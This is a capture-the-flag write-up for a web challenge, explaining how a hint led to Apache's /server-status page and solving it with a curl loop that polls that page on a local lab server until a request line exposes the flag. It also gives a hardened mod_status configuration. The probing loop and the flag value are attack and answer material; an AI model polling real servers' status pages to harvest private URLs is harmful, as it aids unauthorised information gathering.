Tags: web 

Rating:

Reasoning

An attentive player might notice that the Navajo are an ethnic group closely related to the Apache. There is also the word "status" in the challenge description. Together these point to the widely known mod_status feature of the Apache web server, whose default location is /server-status.

As an additional hint, we provided a robots.txt file which also points to /server-status.

Actual solution

A small extra difficulty is that the flag is not always present in the server-status output: mod_status only lists requests that are being processed at the moment the page is rendered, so the request carrying the secret URL shows up only while another client is making it.

Hence, we keep requesting the /server-status endpoint until we get the flag:

$ while true ; do curl -s http://localhost:8000/server-status | grep flag | grep -v 'flag\.txt' ; done
</td><td>127.0.0.1</td><td>http/1.1</td><td nowrap>10.200.0.3:80</td><td nowrap>GET /flag%7Bsecret_url_that_no_one_can_guess%7D HTTP/1.1</td></tr>
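From the defender's side, as an added example that is not part of the original writeup or the challenge's own configuration: the Apache 2.4 directives that create this exposure, next to a hardened variant. The monitoring subnet 192.0.2.0/24 is an assumed placeholder; the two <Location> blocks are alternatives shown together only for comparison, so keep just one in a real httpd.conf.

```apache
# Weak: the status handler is reachable by any client. With mod_status
# loaded, ExtendedStatus defaults to On (Apache >= 2.3.6), so every
# in-flight request line, secret paths included, is visible to anyone
# who polls /server-status.
<Location "/server-status">
    SetHandler server-status
</Location>

# Hardened: limit the handler to the local host plus an assumed monitoring
# network (192.0.2.0/24 is a placeholder), and turn off the per-request
# detail so request lines are not rendered at all.
ExtendedStatus Off
<Location "/server-status">
    SetHandler server-status
    # Multiple Require lines in one container are combined as RequireAny.
    Require local
    Require ip 192.0.2.0/24
</Location>
```

After reloading, check from an external address that /server-status returns 403 and that the loop above no longer finds any request rows.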
Original writeup (https://github.com/oioki/balccon2k20-ctf/tree/master/web/navajo/solution).